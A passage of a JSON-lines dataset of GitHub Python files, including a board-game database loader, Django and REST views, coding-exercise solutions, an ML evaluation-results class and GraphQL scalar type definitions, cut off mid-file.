+{"seq_id":"12981911330","text":"__author__ = 'selim'\n\nfrom app.models import Card, Square, colors\nfrom app import db\nimport os\n\ndirpath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef add_cards(rank):\n\n f = open('{}/cards_rank{}.txt'.format(dirpath, rank), 'r')\n\n for line in f:\n card_info = get_card_info(line)\n card = Card(rank=rank,\n color=card_info['color'],\n value=card_info['value'],\n nblack=card_info['nblack'],\n ngreen=card_info['ngreen'],\n nwhite=card_info['nwhite'],\n nred=card_info['nred'],\n nblue=card_info['nblue']\n )\n db.session.add(card)\n db.session.commit()\n\n\ndef add_squares():\n\n f = open('{}/squares.txt'.format(dirpath), 'r')\n\n for line in f:\n square_info = get_square_info(line)\n square = Square(nblack=square_info['nblack'],\n ngreen=square_info['ngreen'],\n nwhite=square_info['nwhite'],\n nred=square_info['nred'],\n nblue=square_info['nblue']\n )\n db.session.add(square)\n db.session.commit()\n\n\ndef get_card_info(line):\n card_info = {'ngreen': 0, 'nwhite': 0, 'nblue': 0, 'nred': 0, 'nblack': 0}\n\n s = line.split(',')\n card_info['color']= s[0]\n\n # Get card value\n card_info['value'] = 0\n if 'point' in s[-1]:\n card_info['value'] = int(s[-1].replace('points', ''))\n tokens = set(s[1:-1])\n else:\n tokens = set(s[1:])\n\n # Needed tokens to buy card\n for token in tokens:\n for color in colors:\n if color in token:\n card_info['n{}'.format(color)] = int(token.replace(color, ''))\n\n return card_info\n\n\ndef get_square_info(line):\n square_info = {'ngreen': 0, 'nwhite': 0, 'nblue': 0, 'nred': 0, 'nblack': 0}\n\n tokens = line.split(',')\n\n # Needed tokens to buy card\n for token in tokens:\n for color in colors:\n if color in token:\n square_info['n{}'.format(color)] = int(token.replace(color, ''))\n\n return square_info\n\n\ndef setup_cards_squares():\n for rank in [1, 2, 3]:\n add_cards(rank=rank)\n add_squares()","repo_name":"selimyoussry/splendor","sub_path":"cards_squares_setup/addToDB.py","file_name":"addToDB.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19616406213","text":"# David Lindsey - GISC 6389 - Master's Project\r\n# Contact: dcl160230@utdallas.edu\r\n# The following code represents the functionality for GUI_ApplicationDriver.\r\n\r\nimport tkinter\r\nfrom tkinter import messagebox\r\nfrom GUI_HazardsMenu import HazardsMenu\r\n\r\n# For Python 2.7 consideration:\r\n# import Tkinter as tkinter\r\n# import tkMessageBox as messagebox\r\n\r\n# User-defined parameters for width/height of GUI\r\nguiWindow_HazardMenu_Width = 300\r\nguiWindow_HazardMenu_Height = 150\r\n\r\nclass AppDriver(tkinter.Frame):\r\n\r\n # This class represents the primary Python code that user's will execute\r\n # to drive the entire application.\r\n\r\n def __init__(self, *args, **kwargs):\r\n\r\n tkinter.Frame.__init__(self, *args, **kwargs)\r\n\r\n # Executes HazardsMenu class within the AppDriver\r\n hazMenu = HazardsMenu(self)\r\n hazMenu.grid(column=0, row=0, padx=0, pady=0)\r\n\r\n # Shows the GUI parameters from HazardsMenu within the AppDriver frame.\r\n hazMenu.show()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Creates the tkinter GUI window as win.\r\n win = tkinter.Tk()\r\n\r\n # Title of GUI Window\r\n win.title(\"Select Hazard Type\")\r\n\r\n # Pixel width/height of the user's screen\r\n screenWidth = win.winfo_screenwidth()\r\n screenHeight = win.winfo_screenheight()\r\n\r\n # Calculates X/Y start position for the GUI window to appear.\r\n # The following formula will open the GUI window at center of user's screen.\r\n guiWindow_x = (screenWidth / 2) - (guiWindow_HazardMenu_Width / 2)\r\n guiWindow_y = (screenHeight / 3) - (guiWindow_HazardMenu_Height / 3)\r\n\r\n # Geometry parameters for the GUI window.\r\n win.geometry(\"%dx%d+%d+%d\" % (guiWindow_HazardMenu_Width,\r\n guiWindow_HazardMenu_Height, guiWindow_x,\r\n guiWindow_y))\r\n\r\n # GUI Window is locked and non-resizable.\r\n win.resizable(False, False)\r\n\r\n # Execute AppDriver class within the GUI window.\r\n mainGUI = AppDriver(win)\r\n mainGUI.grid(column=0, row=0, padx=0, pady=0)\r\n\r\n # ArcPy module is imported at this location so as to check for any runtime\r\n # errors (due to internet connectivity issues and/or licensing issues).\r\n try:\r\n\r\n import arcpy\r\n\r\n except RuntimeError: # Example: \"Not signed into Portal.\"\r\n\r\n # In the event of a \"Runtime Error\", the user is given an error message.\r\n # The user will be given a choice to continue with the application or\r\n # to exit.\r\n userSelection = messagebox.askyesno(\"Runtime Error Message\",\r\n \"WARNING: Unable to verify ArcGIS licensing.\\n\"\r\n \"As a result, you will not be able to utilize any ArcGIS or ArcPy \"\r\n \"functionality.\\n\"\r\n \"This could be the result of internet connectivity issues or \"\r\n \"licensing problems.\\n\\n\"\r\n \"Do you wish to continue running this application?\\n\"\r\n \"Additional, unexpected problems may be encountered if you choose \"\r\n \"to proceed.\")\r\n\r\n if userSelection == True:\r\n\r\n pass\r\n\r\n else:\r\n\r\n exit()\r\n\r\n # Run mainloop to execute/display the GUI.\r\n win.mainloop()","repo_name":"GeoPotato/Python_MastersProject","sub_path":"GUI_ApplicationDriver.py","file_name":"GUI_ApplicationDriver.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32074175507","text":"'''\r\nA\r\nBB\r\nCCC\r\n'''\r\n\r\nn=int(input())\r\ni=1\r\nwhile i<=n:\r\n j=1\r\n start_char=chr(ord('A')+i-1)\r\n while j<=i:\r\n print(chr(ord(start_char)),end='')\r\n j+=1\r\n print()\r\n i+=1","repo_name":"haspdecrypted/Coding-Ninjas-Intro-to-Python---DSA","sub_path":"patterns1/alpha pattern.py","file_name":"alpha pattern.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11974484743","text":"# https://leetcode.com/problems/determine-whether-matrix-can-be-obtained-by-rotation/\n\n\n\"\"\"\nExample 1:\nInput: mat = [[0,1],[1,0]], target = [[1,0],[0,1]]\nOutput: true\nExplanation: We can rotate mat 90 degrees clockwise to make mat equal target.\n\nExample 2:\nInput: mat = [[0,1],[1,1]], target = [[1,0],[0,1]]\nOutput: false\nExplanation: It is impossible to make mat equal to target by rotating mat.\n\nExample 3:\nInput: mat = [[0,0,0],[0,1,0],[1,1,1]], target = [[1,1,1],[0,1,0],[0,0,0]]\nOutput: true\nExplanation: We can rotate mat 90 degrees clockwise two times to make mat equal target.\n\"\"\"\n\n\n# mat, target = [[0,1],[1,0]], [[1,0],[0,1]]\n# mat, target = [[0,1],[1,1]], [[1,0],[0,1]]\nmat, target = [[0,0,0],[0,1,0],[1,1,1]], [[1,1,1],[0,1,0],[0,0,0]]\n# mat, target = [[0,0],[0,1]], [[0,0],[1,0]]\n\n\n\n# Refer to the LeetCode post:\n# https://leetcode.com/problems/determine-whether-matrix-can-be-obtained-by-rotation/discuss/1253880/Python3-rotate-matrix\n# https://stackoverflow.com/questions/8421337/rotating-a-two-dimensional-array-in-python\nfrom typing import List\nclass Solution:\n def findRotation(self, mat: List[List[int]], target: List[List[int]]) -> bool:\n for _ in range(4): \n if mat == target: return True\n # print(mat[::-1])\n mat = [list(x) for x in zip(*mat[::-1])]\n return False\n\n\n# Runtime: 28 ms, faster than 100.00% of Python3 online submissions for Determine Whether Matrix Can Be Obtained By Rotation.\n# Memory Usage: 14.2 MB, less than 50.00% of Python3 online submissions for Determine Whether Matrix Can Be Obtained By Rotation.\n\n\nsolution = Solution()\nprint(solution.findRotation(mat, target))\n\n\n\n","repo_name":"lucliu20/LeetCode-Easy","sub_path":"1886-Determine Whether Matrix Can Be Obtained By Rotation.py","file_name":"1886-Determine Whether Matrix Can Be Obtained By Rotation.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4659247704","text":"# -*- coding: utf-8; -*-\r\n\"\"\"\r\nGui implementation for gui created via qt-designer.\r\n\"\"\"\r\n__author__ = \"Christoph G. Keller\"\r\n__copyright__ = \"Copyright 2017\"\r\n__credits__ = [\"\"]\r\n__license__ = \"MIT\"\r\n__version__ = \"2.0.0\"\r\n__maintainer__ = \"Christoph G. Keller\"\r\n__email__ = \"christoph.g.keller@gmail.com\"\r\n__status__ = \"Production\"\r\n\r\n\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom .wolf_gui_imp import MainWindow\r\n\r\n\r\ndef main():\r\n import sys\r\n app = QApplication(sys.argv)\r\n frame = MainWindow()\r\n frame.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ckeller42/my_name_is_wolf","sub_path":"my_name_is_wolf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12606384646","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'scrawls'\nurlpatterns = [\n path('walls', views.CreateWall.as_view(), name='walls-create'),\n path('walls/nearest', views.WallIndex.as_view(), name='walls-nearest'),\n path('walls/<int:pk>', views.WallShow.as_view(), name='wall-show'),\n path('walls/<int:pk>/comments', views.CreateComment.as_view(), name='comments-create'),\n]\n","repo_name":"peregrinebalas/scrawl_be","sub_path":"scrawls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41907761091","text":"import random\nfrom statistics import mean\n\n\nclass RandomizeForColleage:\n __raiting = 0 #avg\n __numbers = 0 #count\n __IsBool = True\n __iterable = 0\n __array = []\n\n def __init__(self, values) -> None:\n self.__numbers = values[0]\n self.__raiting = values[1]\n self.__array.clear()\n \n def get_raiting(self):\n return self.__raiting\n \n def get_numbers(self):\n return self.__numbers\n\n def get_bool(self):\n return self.__IsBool\n \n def get_iter(self):\n return self.__iterable\n\n def __dispose_high_value(self):\n val = self.__raiting * self.__numbers / self.__numbers\n ret_val = 0\n\n for i in range(self.__numbers):\n rnd = random.randint(1, 7)\n self.__array.append(int(val - rnd))\n ret_val = ret_val + rnd\n\n iterable = 0\n while ret_val > 0:\n rnd = random.randint(1, 7)\n\n if(self.__array[iterable] + rnd) < 100:\n if ret_val - rnd < 0:\n ret_val = ret_val * (-1)\n self.__array[iterable] = self.__array[iterable] - ret_val\n break\n\n self.__array[iterable] = self.__array[iterable] + rnd\n ret_val = ret_val - rnd\n\n iterable = iterable + 1\n\n if iterable >= self.__numbers:\n iterable = 0\n\n def __dispose_low_value(self):\n smally_values = []\n\n for i in range(0, len(self.__array)):\n if self.__array[i] < 50:\n smally_values.append(50 - self.__array[i])\n self.__array[i] = 50\n\n for i in range(0, len(smally_values)):\n for j in range(len(self.__array)):\n if self.__array[j] - smally_values[i] > 50 and smally_values[i] > 0:\n self.__array[j] = self.__array[j] - smally_values[i]\n smally_values[i] = 0\n break\n\n print(smally_values)\n\n def __fully_array_set(self, some_value):\n if some_value == 100:\n for i in range(0, self.__numbers):\n self.__array.append(100)\n\n elif some_value == 50:\n for i in range(0, self.__numbers):\n self.__array.append(50)\n\n elif 75 <= some_value < 100:\n if self.__raiting >= 90:\n self.__dispose_high_value()\n return\n\n for i in range(0, self.__numbers):\n self.__array.append(random.randint(60, 100))\n\n elif 75 > some_value > 50:\n for i in range(0, self.__numbers):\n self.__array.append(random.randint(30, 100))\n\n self.__dispose_low_value() \n\n\n def run(self):\n while self.__IsBool:\n self.__fully_array_set(self.__raiting)\n\n if round(mean(self.__array)) == self.__raiting:\n self.__iterable += 1\n self.__IsBool = False\n\n return self.__array\n\n self.__array.clear()","repo_name":"rabotyagaya/test","sub_path":"randomize_app.py","file_name":"randomize_app.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9900497440","text":"\"\"\"calculating change\r\nkennedy muranda\r\n17/42014\"\"\"\r\n\r\n#define the function\r\ndef calc_change(change,coin_value): \r\n count=0\r\n while change//coin_value != 0:\r\n count+=1\r\n change-=coin_value\r\n return count\r\n\r\n#prompt user to type in cost\r\ncost=eval(input(\"Enter the cost (in cents):\\n\")) \r\ndeposit=0\r\n\r\nwhile cost>deposit: \r\n deposit=deposit+ eval(input(\"Deposit a coin or note (in cents):\\n\"))\r\n \r\nchange=deposit-cost\r\n\r\nif change!=0:\r\n print(\"Your change is:\") #giving back the change\r\n for i in [100,25,10,5,1]:\r\n coin_number=calc_change(change,i)\r\n change=change-coin_number*i\r\n \r\n if i==100 and coin_number>0:\r\n print(str(coin_number), \"x $1\")\r\n elif coin_number != 0:\r\n print(str(coin_number), \"x\", str(i) + \"c\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/mrnkud004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15395075363","text":"'''\nKristen loves playing with and comparing numbers. She thinks that if she takes two different positive numbers,\nthe one whose digits sum to a larger number is better than the other.\nIf the sum of digits is equal for both numbers, then she thinks the smaller number is better.\nFor example, Kristen thinks that 13 is better than 31 and that 12 is better than 11.\n\nGiven an integer, can you find the divisor of that Kristin will consider to be the best?\n0<n<=10**5\n'''\nimport math\n\nn = 100\nmax_sum = (math.ceil(math.log10(n)))*9\n\n\ndef get_divisors(n):\n def get_sum(d):\n return sum(list(map(int, list(str(int(d))))))\n\n digit_sum = 1\n\n divisor = 1\n for i in range(1, int(math.ceil(math.sqrt(n + 1)))):\n if not n % i:\n g = n // i\n for d in sorted([i, g]):\n # print(d)\n s = get_sum(d)\n if s > digit_sum:\n divisor = d\n digit_sum = s\n return divisor\n\n\ndef solve(a, b, c):\n if c >= (a + b):\n return '1/1'\n else:\n # c<a+b\n min_ = min(a, b)\n max_ = max(a, b)\n\n if c <= min_:\n deno = 2 * a * b\n nume = pow(c, 2)\n elif c <= max_:\n deno = 2 * max_\n nume = 2 * c - min_\n else:\n deno = 2 * min_\n nume = 2 * c - max_\n nume = int(nume)\n deno = int(deno)\n divisor = math.gcd(nume, deno)\n\n nume = nume // divisor\n deno = deno // divisor\n # print(f'{c:0}/{deno}')\n return f'{nume:.0f}/{deno:.0f}'\n\n\nif __name__ == '__main__':\n n = 12\n print(get_divisors(n))","repo_name":"sylviassoleil/clean_code_python","sub_path":"math/best_divisor.py","file_name":"best_divisor.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20872720","text":"import os\nfrom urllib import request\n\nfrom django.core.files import File\nfrom django.db import models\n\n# Create your models here.\n\n\nclass App(models.Model):\n package_name = models.CharField(max_length=250, null=True, blank=True, db_index=True, unique=True)\n name = models.CharField(max_length=250)\n icon = models.ImageField(null=True, blank=True)\n is_top = models.BooleanField(default=True)\n developer = models.CharField(max_length=250, null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n\n def get_remote_image(self, url):\n if url and not self.icon:\n result = request.urlretrieve(url)\n self.icon.save(\n os.path.basename(f'{self.package_name}.jpg'),\n File(open(result[0], 'rb'))\n )\n self.save()\n\n\nclass ScreenShot(models.Model):\n app = models.ForeignKey(App, related_name='screen_shot', db_index=True, on_delete=models.CASCADE)\n url = models.URLField(null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n unique_together = ['app', 'url']\n\n\nclass Video(models.Model):\n app = models.ForeignKey(App, related_name='videos', db_index=True, on_delete=models.CASCADE)\n url = models.URLField(null=True, blank=True)\n thumbnail = models.URLField(null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n unique_together = ['app', 'url']\n","repo_name":"sureshkpiitk/app_scrap","sub_path":"top_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12613983982","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom backend.cars import serializers\n\nfrom .models import Joke\nfrom .serializers import JokeSerializer\n# Create your views here.\n\n# <<<<<<<<<<<<<<< GETS ALL JOKES >>>>>>>>>>>>>>>>>\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef get_all_jokes(request):\n jokes = Joke.object.all() # retrieves joke object\n serializer = JokeSerializer(jokes, many=True) # serializes each joke object\n return Response(serializer.data)\n\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef user_jokes(request): \n if request.method == 'POST':\n serializer = JokeSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(user=request.user)\n return Response(serializer.data,status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'GET':\n jokes = Joke.objects.filter(user_id=request.user.id)\n serializer = JokeSerializer(jokes, many=True)\n return Response(serializer.data) \n","repo_name":"Rahk1990/RanDadJokeGen","sub_path":"backend/jokes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13766586954","text":"\"\"\"\r\nClasses for storing and processing evaluation results.\r\n\"\"\"\r\n\r\nimport os\r\n\r\nimport numpy as np\r\nfrom scipy.special import softmax\r\nfrom sklearn.metrics import accuracy_score, mean_squared_error, roc_auc_score, log_loss, confusion_matrix\r\nfrom sklearn.preprocessing import LabelBinarizer\r\n\r\nfrom utils import sigmoid\r\n\r\n\r\nclass EvalResults:\r\n def __init__(self, num_batches, num_samples, store_preds, y_pred_dim, y_true_dim, y_var_type):\r\n \"\"\"\r\n :param num_batches: number of batches of data that will be used for evaluation\r\n :param num_samples: number of samples that will be used for evaluation\r\n :param store_preds: whether to store predicted values for each sample\r\n :param y_pred_dim: dimension of predicted values\r\n :param y_true_dim: dimension of ground truth labels\r\n :param y_var_type: type of label variable (continuous or categorical)\r\n \"\"\"\r\n self.num_batches = num_batches\r\n self.num_samples = num_samples\r\n self.y_pred_dim = y_pred_dim\r\n self.y_true_dim = y_true_dim\r\n self.y_var_type = y_var_type\r\n # number of samples in each batch (useful because size of last batch may be different)\r\n self.batch_sizes = np.zeros(self.num_batches)\r\n self.losses = np.zeros(self.num_batches) # losses per batch\r\n self.sample_counts = np.zeros(self.num_batches)\r\n self.sample_ids, self.y_pred, self.y_true = None, None, None\r\n self.store_preds = store_preds\r\n self.metrics = dict()\r\n if self.store_preds:\r\n self.sample_ids = None\r\n self.y_pred = np.zeros((self.num_samples, self.y_pred_dim))\r\n self.y_true = np.zeros((self.num_samples, self.y_true_dim))\r\n if self.y_var_type == \"categorical\" or self.y_var_type == \"binary\":\r\n self.y_true = self.y_true.astype(int)\r\n\r\n def add_all_preds(self, y_pred, y_true):\r\n self.y_pred = y_pred\r\n self.y_true = y_true\r\n\r\n def save_preds(self, output_dir):\r\n np.save(os.path.join(output_dir, \"y_pred.npy\"), self.y_pred)\r\n np.save(os.path.join(output_dir, \"y_true.npy\"), self.y_true)\r\n\r\n def add_step_result(self, step, loss, preds, batch):\r\n \"\"\"\r\n :param step: current step in evaluation loop\r\n :param loss: loss for the batch of data\r\n :param preds: predicted values for the batch of data\r\n :param batch: the batch of data\r\n \"\"\"\r\n batch_size = len(batch[\"ID\"])\r\n self.batch_sizes[step] = batch_size\r\n self.losses[step] = loss.item()\r\n if self.store_preds:\r\n start_idx = step * batch_size\r\n end_idx = start_idx + batch_size\r\n _sample_ids = np.array(batch[\"ID\"])\r\n self.sample_ids = _sample_ids if self.sample_ids is None else np.concatenate((self.sample_ids, _sample_ids))\r\n self.y_pred[start_idx:end_idx] = preds.cpu().numpy()\r\n _y_true = batch['y'].numpy()\r\n if len(_y_true.shape) == 1: # reshape to match expected shape\r\n _y_true = _y_true[:, None]\r\n self.y_true[start_idx:end_idx] = _y_true\r\n\r\n def compute_mean_loss(self):\r\n total = np.dot(self.batch_sizes, self.losses)\r\n mean_loss = total / sum(self.batch_sizes)\r\n self.metrics[\"loss\"] = mean_loss\r\n\r\n def add_time_info(self, eval_time):\r\n \"\"\"\r\n :param eval_time: time it took to complete evaluation\r\n \"\"\"\r\n self.metrics[\"time\"] = eval_time\r\n\r\n def compute_metrics(self, metrics, normalize_preds=False):\r\n assert self.store_preds, \"need to store prediction in order to compute metrics\"\r\n for metric_name in metrics:\r\n if metric_name == \"accuracy\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute accuracy for discrete vars\"\r\n # convert y predictions from probs to categories\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n _y_pred = _convert_from_prob_to_class(_y_pred)\r\n self.metrics[\"accuracy\"] = accuracy_score(self.y_true, _y_pred)\r\n elif metric_name == \"AUC\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute AUC for discrete vals\"\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n # if labels are binary and preds are 2-D, take prob's associated with label 1\r\n if self.y_var_type == \"binary\" and len(_y_pred.shape) > 1 and _y_pred.shape[1] == 2:\r\n _y_pred = _y_pred[:, 1]\r\n # check if labels are all the same class --> if so AUC is undefined\r\n if len(np.unique(self.y_true)) == 1:\r\n print(\"WARNING: only 1 class found in y_true, AUC is undefined\")\r\n return np.NAN\r\n # convert true labels from indices to one-hot encodings\r\n _y_true = _idx_to_one_hot(self.y_true)\r\n self.metrics[\"AUC\"] = roc_auc_score(_y_true, _y_pred, multi_class='ovo')\r\n elif metric_name == \"cross_entropy\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute cross entropy for discrete vars\"\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n self.metrics[\"cross_entropy\"] = log_loss(self.y_true, _y_pred)\r\n elif metric_name == \"confusion_matrix\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute cross entropy for discrete vars\"\r\n # convert y predictions from probs to categories\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n _y_pred = _convert_from_prob_to_class(_y_pred)\r\n self.metrics[\"confusion_matrix\"] = confusion_matrix(self.y_true, _y_pred).tolist()\r\n elif metric_name == \"MSE\":\r\n assert self.y_var_type == \"continuous\", \"can only compute MSE for continuous vars\"\r\n self.metrics[\"MSE\"] = mean_squared_error(self.y_true, self.y_pred)\r\n else:\r\n print(f\"Unrecognized metric name {metric_name}\")\r\n print(\"Exiting...\")\r\n exit(1)\r\n\r\n\r\n# helper functions\r\ndef _convert_from_prob_to_class(y_pred):\r\n if len(y_pred.shape) > 1 and y_pred.shape[1] > 1:\r\n _y_pred = np.argmax(y_pred, axis=1)\r\n else: # binary prediction\r\n _y_pred = y_pred > 0.5\r\n return _y_pred\r\n\r\n\r\ndef _normalize_preds(y_pred, y_var_type):\r\n \"\"\"\r\n Used for when NN outputs logits rather than than sigmoid(logits)\r\n \"\"\"\r\n if y_var_type == \"categorical\":\r\n return softmax(y_pred, axis=1)\r\n # otherwise will be binary\r\n return np.array([sigmoid(pred) for pred in y_pred])\r\n\r\n\r\ndef _idx_to_one_hot(y):\r\n lb = LabelBinarizer()\r\n return lb.fit_transform(y)\r\n","repo_name":"kmatton/contrastive-learning-for-eda","sub_path":"modeling/evaluation/eval_results.py","file_name":"eval_results.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"19857823111","text":"import json\n\nimport core\n\nturned_on = True\n\ndata = []\nmain_input = ''\nmain_output = ''\n\nfunctions = {\"debug\" : core.debug, \"debug_2\" : core.debug_2, \"echo\" : core.echo}\n\n\ndef main(current):\n main_input = input('> ')\n with open(\"core_transfer.json\", 'r') as f:\n data = json.load(f)\n # print(data)\n\n with open(\"core_transfer.json\", 'w+') as f:\n # print(data)\n data['main_input'] = main_input\n # print(data)\n json.dump(data, f)\n\n with open(\"core_transfer.json\", 'r') as f:\n core.update(functions.get(current))\n data = json.load(f)\n main_output = data[\"main_output\"]\n\n print(main_output)\n\n\nif __name__ == '__main__':\n while turned_on:\n current = input(\"> \").lower()\n main(current)\n","repo_name":"4ewhatGIT/peacedeck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12877671227","text":"import numpy as np\nimport utils\nimport sys\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\n\nclass Operations:\n def __init__(self, size, repeatNum, imost=True):\n self.size = size\n self.repeatNum = repeatNum\n self.imgorState = imost\n\n def actionTranslation(self, action):#0-6 = -, 7 = 0, 8-14 = +\n dicty = {0:-0.77, 1:-0.66, 2:-0.55, 3:-0.44, 4:-0.33, 5:-0.22, 6:-0.11, 7:0.0, 8:0.11, 9:0.22, 10:0.33, 11:0.44, 12:0.55, 13:0.66, 14:0.77}\n return dicty[action]\n\n def argMax(self, action):\n return np.argmax(action)\n\n #Adds Image to the front, removing from the back of the array\n def addImage(self, imageList, image):\n #Insert to the front, delete back image\n imageList = np.insert(imageList, 0, image)\n del imageList[self.size/self.repeatNum:]\n return imageList\n\n #Takes the image and repeats or adds it in the correct location\n def createExperience(self, imageList, image):\n if imageList == []:\n output = np.repeat(image, self.repeatNum)\n else:\n output = self.addImage(imageList, image)\n return output, imageList\n\n\n def createImage(self, image):\n output = Image.open(BytesIO(base64.b64decode(image)))\n try:\n output = np.asarray(output) # from PIL image to numpy array\n # output = utils.preprocess(output) # apply the preprocessing\n output = np.array([output]) # the model expects 4D array\n output = output.flatten()\n return output/255.0\n\n except Exception as e:\n print(e)\n sys.exit(1)\n\n def checkReward(self, reward):\n if reward == 0.0:\n return -0.001\n else:\n return reward","repo_name":"marho13/SteeringDockingPaper","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42502598098","text":"\"\"\"\n This module imports GraphQL types from graphql-core, but also defines some\n additional custom types.\n\"\"\"\n\nimport datetime\nimport decimal\nimport json\nfrom typing import Any\nfrom dateutil.parser.isoparser import DEFAULT_ISOPARSER\n\nimport graphql.type\n# Had to disable pylint below, because \"No name '...' in module '...'\"\nfrom graphql.language.ast import ValueNode, StringValueNode # pylint: disable=no-name-in-module\nfrom graphql.language.printer import print_ast\n\n# native scalar types\n\nBoolean = graphql.type.GraphQLBoolean\nInt = graphql.type.GraphQLInt\nFloat = graphql.type.GraphQLFloat\nString = graphql.type.GraphQLString\n\n# native scalar wrappers\n\nUnion = graphql.type.GraphQLUnionType\nList = graphql.type.GraphQLList\nNonNull = graphql.type.GraphQLNonNull\n\n# decimal type\n\ndef serialize_decimal(output_value: decimal.Decimal) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return str(output_value)\n\ndef parse_decimal_value(input_value: Any) -> decimal.Decimal:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return decimal.Decimal(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse Decimal from: {repr(input_value)}, got: {error}') from error\n\ndef parse_decimal_literal(value_node: ValueNode, _variables: Any = None) -> decimal.Decimal:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"Decimal should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_decimal_value(value_node.value)\n\nDecimal = graphql.type.GraphQLScalarType(\n name = 'Decimal',\n description = 'A decimal (fixed-point)',\n serialize = serialize_decimal,\n parse_value = parse_decimal_value,\n parse_literal = parse_decimal_literal,\n)\n\n# datetime type\n\ndef serialize_datetime(output_value: datetime.datetime) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return output_value.isoformat()\n\ndef parse_datetime_value(input_value: Any) -> datetime.datetime:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.isoparse(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse DateTime from: {repr(input_value)}, got: {error}') from error\n\ndef parse_datetime_literal(value_node: ValueNode, _variables: Any = None) -> datetime.datetime:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"DateTime should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_datetime_value(value_node.value)\n\nDateTime = graphql.type.GraphQLScalarType(\n name = 'DateTime',\n description = 'A datetime element, serialized in standard \"YYYY-MM-DDThh:ii::ss.mmmmmm\" format',\n serialize = serialize_datetime,\n parse_value = parse_datetime_value,\n parse_literal = parse_datetime_literal,\n)\n\n# date type\n\ndef serialize_date(output_value: datetime.date) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return output_value.isoformat()\n\ndef parse_date_value(input_value: Any) -> datetime.date:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.parse_isodate(input_value)\n except Exception as error:\n raise ValueError(f'Cannot parse Date from: {repr(input_value)}, got: {error}') from error\n\ndef parse_date_literal(value_node: ValueNode, _variables: Any = None) -> datetime.date:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, 